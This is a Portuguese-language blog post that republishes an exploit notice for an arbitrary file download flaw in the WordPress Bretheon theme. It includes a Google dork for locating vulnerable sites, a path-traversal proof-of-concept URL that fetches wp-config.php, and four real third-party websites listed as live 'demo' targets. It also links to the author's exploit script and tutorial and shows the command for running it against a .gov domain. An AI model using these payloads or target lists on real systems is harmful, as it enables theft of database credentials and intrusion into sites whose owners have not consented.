domingo, 18 de janeiro de 2015

Arbitrary File Download vulnerability no tema Bretheon do wordpress


Arbitrary File Download vulnerability o que eu chamo de A.F.D.
Foi encontrada tal falha no tema Bretheon do wordpress.
--------------------------------------------------------------------------------------------------------------
DETALHES Acesso: http://1337day.com/exploit/23140 Exploit Title: Wordpress Theme Bretheon Arbitrary File Download Vulnerability Date: 17/01/2014 Exploit Author: MindCracker - Team MaDLeeTs Contact : Md5@live.com.pk - Maddy@live.com.pk| https://twitter.com/MindCrackerKhan  Tested on: Linux / Window  Google Dork: inurl:wp-content/themes/bretheon/ Demo  http://infiniteloopcorp.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php http://scottysgym.com.au/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php http://vladlogistik.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php http://transinfo.nnov.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php   PoC  http://target/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


DETALHES
Acesso: http://1337day.com/exploit/23140
Exploit Title: Wordpress Theme Bretheon Arbitrary File Download Vulnerability
Date: 17/01/2014
Exploit Author: MindCracker - Team MaDLeeTs
Contact : Md5@live.com.pk - Maddy@live.com.pk| https://twitter.com/MindCrackerKhan 
Tested on: Linux / Window

Google Dork: inurl:wp-content/themes/bretheon/
Demo

http://infiniteloopcorp.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://scottysgym.com.au/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://vladlogistik.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://transinfo.nnov.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

 PoC

http://target/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
--------------------------------------------------------------------------------------------------------------

Como tal falha no tema não usa nada de novo e o caminho padrão "admin-ajax.php?action=revslider_show_image&img="  nosso exploit desenvolvido meses atrás já faz tal verificação e pode ser usado tranquilamente.
--------------------------------------------------------------------------------------------------------------

[TUTORIAL]: 

https://www.youtube.com/watch?v=w6pxPR_s05w

TUTORIAL DETALHES:
http://blog.inurl.com.br/2015/01/wordpress-themes-downloadphp-file.html

EXECUTE:
php exploit.php www.target.gov.us
--------------------------------------------------------------------------------------------------------------

[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL

[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL

http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html
--------------------------------------------------------------------------------------------------------------

Nenhum comentário:

Postar um comentário

............